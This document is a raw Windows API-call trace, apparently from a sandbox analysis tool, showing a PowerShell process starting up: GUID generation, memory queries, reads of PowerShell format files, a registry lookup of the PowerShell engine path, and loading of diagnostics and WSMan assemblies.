	[0786.502] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x9fe74c9b, Data2=0xdfc9, Data3=0x4461, Data4=([0]=0x84, [1]=0xcb, [2]=0x7f, [3]=0x52, [4]=0xdd, [5]=0x8c, [6]=0xb5, [7]=0x87))) returned 0x0
	[0786.502] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x3bcb9a43, Data2=0xfa66, Data3=0x4814, Data4=([0]=0x9d, [1]=0xee, [2]=0xd2, [3]=0x85, [4]=0x43, [5]=0xf, [6]=0x56, [7]=0xbc))) returned 0x0
	[0786.502] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xabd86ffb, Data2=0xb558, Data3=0x4701, Data4=([0]=0xaf, [1]=0x3, [2]=0xe0, [3]=0x84, [4]=0x56, [5]=0x44, [6]=0x34, [7]=0x48))) returned 0x0
	[0786.502] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xb1d17bd4, Data2=0xf98b, Data3=0x49f5, Data4=([0]=0xa7, [1]=0x77, [2]=0x3a, [3]=0x9f, [4]=0x8d, [5]=0x9a, [6]=0x33, [7]=0xae))) returned 0x0
	[0786.502] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x2802c984, Data2=0x7a2f, Data3=0x4166, Data4=([0]=0xaf, [1]=0xc8, [2]=0xef, [3]=0xda, [4]=0x74, [5]=0xe9, [6]=0x12, [7]=0x43))) returned 0x0
	[0786.503] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x4622e018, Data2=0x4c92, Data3=0x4ae2, Data4=([0]=0x80, [1]=0x8e, [2]=0x0, [3]=0xc6, [4]=0x7e, [5]=0xa7, [6]=0x1a, [7]=0xd))) returned 0x0
	[0786.503] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x92bf95fc, Data2=0xd503, Data3=0x4dbb, Data4=([0]=0xab, [1]=0x72, [2]=0xd1, [3]=0xd7, [4]=0x64, [5]=0x7, [6]=0xf9, [7]=0xbc))) returned 0x0
	[0786.503] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x52c17afa, Data2=0x73d1, Data3=0x4a7b, Data4=([0]=0x83, [1]=0x59, [2]=0x61, [3]=0x8f, [4]=0x54, [5]=0x28, [6]=0xe9, [7]=0xd4))) returned 0x0
	[0786.503] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x18918094, Data2=0xf504, Data3=0x4344, Data4=([0]=0x8d, [1]=0x5e, [2]=0x97, [3]=0x7d, [4]=0xdb, [5]=0x73, [6]=0x3c, [7]=0x7a))) returned 0x0
	[0786.503] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x2d794307, Data2=0xdcc, Data3=0x428f, Data4=([0]=0x8f, [1]=0x2b, [2]=0x47, [3]=0x3c, [4]=0xeb, [5]=0x83, [6]=0x72, [7]=0xa8))) returned 0x0
	[0786.503] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x538a06e9, Data2=0x641e, Data3=0x409e, Data4=([0]=0x95, [1]=0x8c, [2]=0x74, [3]=0x38, [4]=0x65, [5]=0xaa, [6]=0xd7, [7]=0x35))) returned 0x0
	[0786.504] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x2fbf3f4f, Data2=0x718f, Data3=0x4751, Data4=([0]=0xbf, [1]=0x25, [2]=0x49, [3]=0x2, [4]=0x7b, [5]=0xe1, [6]=0x61, [7]=0x72))) returned 0x0
	[0786.504] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x41306df2, Data2=0x78f, Data3=0x4a38, Data4=([0]=0xb8, [1]=0x82, [2]=0xc6, [3]=0x53, [4]=0x3d, [5]=0xb3, [6]=0xee, [7]=0xa4))) returned 0x0
	[0786.504] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x7def4613, Data2=0xa6c0, Data3=0x41a2, Data4=([0]=0x9b, [1]=0x93, [2]=0x7f, [3]=0x7a, [4]=0x40, [5]=0x70, [6]=0x12, [7]=0x26))) returned 0x0
	[0786.504] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xb1c30182, Data2=0xab76, Data3=0x47c2, Data4=([0]=0x96, [1]=0x39, [2]=0xaf, [3]=0xfd, [4]=0xe8, [5]=0xef, [6]=0x4b, [7]=0x94))) returned 0x0
	[0786.504] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x51d38469, Data2=0xc56d, Data3=0x4138, Data4=([0]=0x9f, [1]=0x22, [2]=0x81, [3]=0xd9, [4]=0x8c, [5]=0xa9, [6]=0xb2, [7]=0xda))) returned 0x0
	[0786.504] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x68e86857, Data2=0x51f2, Data3=0x467a, Data4=([0]=0xa5, [1]=0xe9, [2]=0x5, [3]=0x13, [4]=0x1a, [5]=0x9e, [6]=0xdc, [7]=0x6e))) returned 0x0
	[0786.505] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x35f490d7, Data2=0x842d, Data3=0x4ce6, Data4=([0]=0x83, [1]=0xd1, [2]=0xf8, [3]=0xf4, [4]=0xfb, [5]=0xee, [6]=0xe5, [7]=0x5a))) returned 0x0
	[0786.505] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x34022cf8, Data2=0x5300, Data3=0x417d, Data4=([0]=0x98, [1]=0xe8, [2]=0x23, [3]=0x54, [4]=0x4b, [5]=0x1f, [6]=0xd8, [7]=0x1d))) returned 0x0
	[0786.505] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xc32eede6, Data2=0xabc4, Data3=0x4576, Data4=([0]=0xa2, [1]=0x23, [2]=0x70, [3]=0x44, [4]=0xd, [5]=0x94, [6]=0x52, [7]=0xed))) returned 0x0
	[0786.505] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xec8c61a0, Data2=0x4e6d, Data3=0x4520, Data4=([0]=0x9a, [1]=0xf7, [2]=0x26, [3]=0x5f, [4]=0xfe, [5]=0x78, [6]=0x2d, [7]=0xe1))) returned 0x0
	[0786.505] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xca429184, Data2=0x4ec6, Data3=0x43f1, Data4=([0]=0x87, [1]=0x38, [2]=0x57, [3]=0xaa, [4]=0xa2, [5]=0x77, [6]=0x18, [7]=0xbc))) returned 0x0
	[0786.505] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x2ab0452f, Data2=0xc164, Data3=0x4f8e, Data4=([0]=0xa0, [1]=0x77, [2]=0xa3, [3]=0x96, [4]=0xc2, [5]=0x49, [6]=0xfb, [7]=0x6a))) returned 0x0
	[0786.506] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x45b3f0d9, Data2=0x83f7, Data3=0x4deb, Data4=([0]=0x9e, [1]=0x2f, [2]=0x1e, [3]=0x8, [4]=0x61, [5]=0xda, [6]=0xff, [7]=0x97))) returned 0x0
	[0787.490] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x7886325c, Data2=0x7dd5, Data3=0x4976, Data4=([0]=0x90, [1]=0x6f, [2]=0x73, [3]=0x61, [4]=0xa7, [5]=0x4, [6]=0x26, [7]=0x70))) returned 0x0
	[0787.490] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x34658e17, Data2=0xb29, Data3=0x4401, Data4=([0]=0x82, [1]=0xe2, [2]=0x22, [3]=0xf1, [4]=0xf7, [5]=0xf4, [6]=0x72, [7]=0xd1))) returned 0x0
	[0787.490] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x51c96b32, Data2=0x16cf, Data3=0x4603, Data4=([0]=0xad, [1]=0xcc, [2]=0xc7, [3]=0x50, [4]=0xac, [5]=0x58, [6]=0xc, [7]=0x9f))) returned 0x0
	[0787.490] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xe69f2b3b, Data2=0xb9ef, Data3=0x4103, Data4=([0]=0x85, [1]=0x8d, [2]=0xb3, [3]=0x65, [4]=0xd6, [5]=0xe2, [6]=0x33, [7]=0x16))) returned 0x0
	[0787.490] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x1427eae5, Data2=0xd80b, Data3=0x400e, Data4=([0]=0x8f, [1]=0x42, [2]=0x79, [3]=0x7e, [4]=0x1e, [5]=0xd1, [6]=0x39, [7]=0xe7))) returned 0x0
	[0787.490] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x53e5cf93, Data2=0x703f, Data3=0x4eac, Data4=([0]=0x9e, [1]=0x6a, [2]=0x3d, [3]=0x93, [4]=0x6e, [5]=0x1b, [6]=0x3d, [7]=0x20))) returned 0x0
	[0787.490] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xfe55b00b, Data2=0x693c, Data3=0x4965, Data4=([0]=0xb8, [1]=0xaf, [2]=0x85, [3]=0x2e, [4]=0x8c, [5]=0x38, [6]=0x4d, [7]=0x57))) returned 0x0
	[0787.491] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x32126c0d, Data2=0x1ac6, Data3=0x43bb, Data4=([0]=0x8e, [1]=0x3f, [2]=0x41, [3]=0xc4, [4]=0xb5, [5]=0xc1, [6]=0x5e, [7]=0xac))) returned 0x0
	[0787.491] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x4dff6581, Data2=0xc44e, Data3=0x48da, Data4=([0]=0x84, [1]=0x27, [2]=0x23, [3]=0x8d, [4]=0xdb, [5]=0xa2, [6]=0xc7, [7]=0x89))) returned 0x0
	[0787.491] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xa1551c37, Data2=0x596b, Data3=0x46bd, Data4=([0]=0xac, [1]=0xd9, [2]=0xa0, [3]=0xfe, [4]=0x5f, [5]=0xf9, [6]=0xe2, [7]=0x94))) returned 0x0
	[0787.491] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x36602577, Data2=0x335b, Data3=0x4d6c, Data4=([0]=0xb0, [1]=0xe6, [2]=0x3e, [3]=0x32, [4]=0xc2, [5]=0x4, [6]=0x65, [7]=0x90))) returned 0x0
	[0787.491] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x4b747dd, Data2=0xf05, Data3=0x4399, Data4=([0]=0xaa, [1]=0x4c, [2]=0x2a, [3]=0x3a, [4]=0x5d, [5]=0x98, [6]=0xcc, [7]=0xe0))) returned 0x0
	[0787.492] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x429e824, Data2=0xcf5, Data3=0x4d30, Data4=([0]=0xb3, [1]=0x24, [2]=0xf9, [3]=0x50, [4]=0xfb, [5]=0xf9, [6]=0x2b, [7]=0xc4))) returned 0x0
	[0787.492] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xd72cd9f3, Data2=0x7df2, Data3=0x4ccd, Data4=([0]=0xb4, [1]=0xc0, [2]=0x1, [3]=0x29, [4]=0x9e, [5]=0xaa, [6]=0x7b, [7]=0x6c))) returned 0x0
	[0787.502] VirtualQuery (in: lpAddress=0x1eba10, lpBuffer=0x1ec8d0, dwLength=0x30 | out: lpBuffer=0x1ec8d0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0787.503] VirtualQuery (in: lpAddress=0x1eba10, lpBuffer=0x1ec8d0, dwLength=0x30 | out: lpBuffer=0x1ec8d0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0787.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0787.504] SetErrorMode (uMode=0x1) returned 0x1
	[0787.504] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0787.504] GetFileType (hFile=0x314) returned 0x1
	[0787.504] SetErrorMode (uMode=0x1) returned 0x1
	[0787.504] GetFileType (hFile=0x314) returned 0x1
	[0787.504] ReadFile (in: hFile=0x314, lpBuffer=0x2f6a4e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x2f6a4e0*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0787.505] ReadFile (in: hFile=0x314, lpBuffer=0x2f6a4e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x2f6a4e0*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0787.505] ReadFile (in: hFile=0x314, lpBuffer=0x2f6a4e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x2f6a4e0*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0787.506] ReadFile (in: hFile=0x314, lpBuffer=0x2f6a4e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x2f6a4e0*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0787.506] ReadFile (in: hFile=0x314, lpBuffer=0x2f6a4e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x2f6a4e0*, lpNumberOfBytesRead=0x1ecd38*=0x8b4, lpOverlapped=0x0) returned 1
	[0787.506] ReadFile (in: hFile=0x314, lpBuffer=0x2f698fc, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x2f698fc*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0787.506] ReadFile (in: hFile=0x314, lpBuffer=0x2f6a4e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x2f6a4e0*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0787.506] CloseHandle (hObject=0x314) returned 1
	[0787.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0787.507] SetErrorMode (uMode=0x1) returned 0x1
	[0787.507] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecce0 | out: lpFileInformation=0x1ecce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0787.507] SetErrorMode (uMode=0x1) returned 0x1
	[0787.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0787.507] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecdc8 | out: phkResult=0x1ecdc8*=0x314) returned 0x0
	[0787.507] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd4c, lpData=0x0, lpcbData=0x1ecd48*=0x0 | out: lpType=0x1ecd4c*=0x1, lpData=0x0, lpcbData=0x1ecd48*=0x56) returned 0x0
	[0787.507] CoTaskMemAlloc (cb=0x5a) returned 0x47ed70
	[0787.507] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd1c, lpData=0x47ed70, lpcbData=0x1ecd18*=0x56 | out: lpType=0x1ecd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd18*=0x56) returned 0x0
	[0787.507] CoTaskMemFree (pv=0x47ed70) 
	[0787.507] RegCloseKey (hKey=0x314) returned 0x0
	[0787.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0787.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0787.508] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x7d8ffef3, Data2=0x77a0, Data3=0x4bca, Data4=([0]=0xac, [1]=0xef, [2]=0xef, [3]=0xe, [4]=0xb4, [5]=0xb6, [6]=0x43, [7]=0x7c))) returned 0x0
	[0787.508] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x71e322df, Data2=0xc41f, Data3=0x4c5b, Data4=([0]=0xb3, [1]=0xf3, [2]=0x44, [3]=0x6d, [4]=0x73, [5]=0x68, [6]=0x7, [7]=0x4))) returned 0x0
	[0787.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0787.509] SetErrorMode (uMode=0x1) returned 0x1
	[0787.509] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0787.510] GetFileType (hFile=0x314) returned 0x1
	[0787.510] SetErrorMode (uMode=0x1) returned 0x1
	[0787.510] GetFileType (hFile=0x314) returned 0x1
	[0787.510] ReadFile (in: hFile=0x314, lpBuffer=0x2fa82c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x2fa82c8*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0787.511] ReadFile (in: hFile=0x314, lpBuffer=0x2fa82c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x2fa82c8*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0787.511] ReadFile (in: hFile=0x314, lpBuffer=0x2fa82c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x2fa82c8*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0787.511] ReadFile (in: hFile=0x314, lpBuffer=0x2fa82c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x2fa82c8*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0787.511] ReadFile (in: hFile=0x314, lpBuffer=0x2fa82c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x2fa82c8*, lpNumberOfBytesRead=0x1ecd38*=0xe98, lpOverlapped=0x0) returned 1
	[0787.512] ReadFile (in: hFile=0x314, lpBuffer=0x2fa78c8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x2fa78c8*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0787.512] ReadFile (in: hFile=0x314, lpBuffer=0x2fa82c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x2fa82c8*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0787.512] CloseHandle (hObject=0x314) returned 1
	[0787.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0787.512] SetErrorMode (uMode=0x1) returned 0x1
	[0787.512] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecce0 | out: lpFileInformation=0x1ecce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0787.512] SetErrorMode (uMode=0x1) returned 0x1
	[0787.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0787.513] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecdc8 | out: phkResult=0x1ecdc8*=0x314) returned 0x0
	[0787.513] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd4c, lpData=0x0, lpcbData=0x1ecd48*=0x0 | out: lpType=0x1ecd4c*=0x1, lpData=0x0, lpcbData=0x1ecd48*=0x56) returned 0x0
	[0787.513] CoTaskMemAlloc (cb=0x5a) returned 0x47ed70
	[0787.513] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd1c, lpData=0x47ed70, lpcbData=0x1ecd18*=0x56 | out: lpType=0x1ecd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd18*=0x56) returned 0x0
	[0787.513] CoTaskMemFree (pv=0x47ed70) 
	[0787.513] RegCloseKey (hKey=0x314) returned 0x0
	[0787.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0787.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0787.514] VirtualQuery (in: lpAddress=0x1eb860, lpBuffer=0x1ec720, dwLength=0x30 | out: lpBuffer=0x1ec720*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0787.515] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x48a1ff1b, Data2=0xfd27, Data3=0x4fe2, Data4=([0]=0xb8, [1]=0x82, [2]=0x8a, [3]=0x61, [4]=0x74, [5]=0xc3, [6]=0x72, [7]=0xb6))) returned 0x0
	[0787.516] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xa84f5ddc, Data2=0xe8a9, Data3=0x4701, Data4=([0]=0x8e, [1]=0xc7, [2]=0xc1, [3]=0xe5, [4]=0x0, [5]=0xee, [6]=0xd3, [7]=0xd5))) returned 0x0
	[0788.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ecd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0788.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ecd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0789.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ecd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0789.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ecd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0790.699] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0790.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.700] CoTaskMemFree (pv=0x41ef10) 
